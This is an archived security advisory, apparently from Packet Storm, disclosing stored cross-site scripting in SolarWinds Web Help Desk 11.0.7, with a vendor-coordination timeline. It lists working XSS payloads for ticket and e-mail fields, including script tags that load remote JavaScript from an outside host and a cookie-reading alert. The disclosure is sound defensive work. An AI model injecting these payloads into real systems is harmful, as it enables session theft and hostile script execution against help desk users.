what you don't know can hurt you

Web Help Desk 11.0.7 Cross Site Scripting

Web Help Desk 11.0.7 Cross Site Scripting
Posted Oct 8, 2012
Authored by loneferret

Web Help Desk version 11.0.7 suffers from a stored cross site scripting vulnerability.

tags | exploit, web, xss
MD5 | 009e50e6e116669af0dfb511b60a9e0a

Web Help Desk 11.0.7 Cross Site Scripting

Change Mirror Download
# Author: loneferret of Offensive Security
# Product: Web Help Desk by SolarWinds
# Version: 11.0.7 (older versions may be affected)
# Vendor Site: http://www.webhelpdesk.com
# Software Download: http://www.webhelpdesk.com/help-desk-software/

# Discovered: August 18th 2012
# Disclosure:
# August 19th 2012: Reported to CERT
# August 24th 2012: Public disclosure date is October 8th 2012
# August 28th 2012: Vendor responded, should fix by disclosure date
# August 29th 2012: Vendor asked information on Stored XSS in 'Rejected E-Mail Section'
# August 29th 2012: Sent vendor instructions on how to trigger XSS (not fully documented here)*
# September 21 2012: Vendor sends pre-release version to test (11.0.8)
# September 23 2012: Replied. Still XSS in "Rejected E-Mail Section' but not in Tickets
# September 24 2012: Vendor replied saying "Rejected E-Mail" XSS slated to be fix in next version
# October 8th 2012: Public release

# Vulnerabilities:
# Stored XSS via client web ticket submit system
# Effected fields: Subject & Request Details
# Payload: <script>alert(document.cookie);</script>

# Stored XSS via E-Mail
# Tickets created automatically vis e-mail will also trigger the XSS when viewing.
# Following payloads are triggered with default regular expression filters
# Body field
# Payloads:
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<iframe SRC="javascript:alert('XSS Body');"></iframe>

# Subject field
# Payloads:
<BODY ONLOAD=alert('XSS')>**
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<iframe SRC="javascript:alert('XSS Subject');"></iframe>

# *Viewing rejected e-mails via the 'email.eml' in the "Raw Message Data" section.
# Some payloads:
# <SCRIPT SRC=http://ha.ckers.org/xss.js>
# <XSS STYLE='no\xss:noxss("*//*");xss:ex&#x2F;*XSS*//*/*/pression(alert("XSS"))'>

# **To trigger XSS must click on "My Tickets" or "Group Tickets"

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close